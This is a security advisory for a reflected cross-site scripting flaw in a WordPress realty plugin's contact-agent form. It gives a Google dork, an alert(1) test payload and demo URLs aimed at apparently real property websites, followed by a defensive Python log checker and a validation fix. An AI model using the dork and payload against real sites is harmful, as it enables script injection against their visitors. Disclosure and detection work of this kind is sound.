WordPress Zoo Realty Plugin Cross-Site Scripting Vulnerability

2013.10.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#############################
# Exploit Title : WordPress Zoo Realty Plugin Cross-Site Scripting Vulnerability
#
# Author : Ashiyane Digital Security Team
#
# Date : 2013/10/05
#
# Vendor Homepage : http://wordpress.org
#
# Google Dork : inurl:wp-content/plugins/Realty/display/elements/form_contact_agent.php
#
##############
# Location : site//wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=[xss]&popup=1
#
# Method : GET
#
# Script for Test : "/><script>alert(1);</script>
##############
# Demo:
#
# http://www.absXde.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.aXm.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.homeXnds.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.newsXciesforsale.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.planXoperties.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
###########################
#
# Discovered By : ACC3SS
#
###########################
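
Added example, not part of the original advisory: a web-server log check that flags requests to the affected script whose user_id is not a plain integer. It assumes Combined Log Format access logs and that a legitimate user_id is a numeric WordPress user ID; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Script path from the advisory, compared in lower case.
PLUGIN_PATH = "/wp-content/plugins/realty/display/elements/form_contact_agent.php"

# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Assumption: a legitimate user_id is a numeric WordPress user ID.
NUMERIC_ID = re.compile(r"[0-9]+")


def suspicious_user_id(log_line):
    """Return the decoded user_id when the request hits the plugin form
    with a non-numeric user_id, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    path, _, query = match.group("target").partition("?")
    # Decode and collapse repeated slashes so "//wp-content/..." also matches.
    path = re.sub(r"/{2,}", "/", unquote(path)).lower()
    if not path.endswith(PLUGIN_PATH):
        return None
    # parse_qs percent-decodes values; a repeated parameter yields several.
    for value in parse_qs(query, keep_blank_values=True).get("user_id", []):
        if not NUMERIC_ID.fullmatch(value):
            return value
    return None


def flag_lines(lines):
    """Return (line_number, decoded_user_id) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_user_id(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample log lines (documentation IP range, not real traffic).
_FORM = "/wp-content/plugins/Realty/display/elements/form_contact_agent.php"
SAMPLE_LOG = [
    f'203.0.113.7 - - [05/Oct/2013:10:12:01 +0000] "GET {_FORM}?user_id=12&popup=1 HTTP/1.1" 200 1842',
    f'203.0.113.9 - - [05/Oct/2013:10:12:44 +0000] "GET {_FORM}?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 HTTP/1.1" 200 1901',
    '203.0.113.9 - - [05/Oct/2013:10:13:02 +0000] "GET /index.php?user_id=abc HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, value in flag_lines(SAMPLE_LOG):
        print(f"line {number}: non-numeric user_id {value!r}")
```

The same integer-only rule applied server-side, before the value is written into the page, closes the reflection rather than only detecting it.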

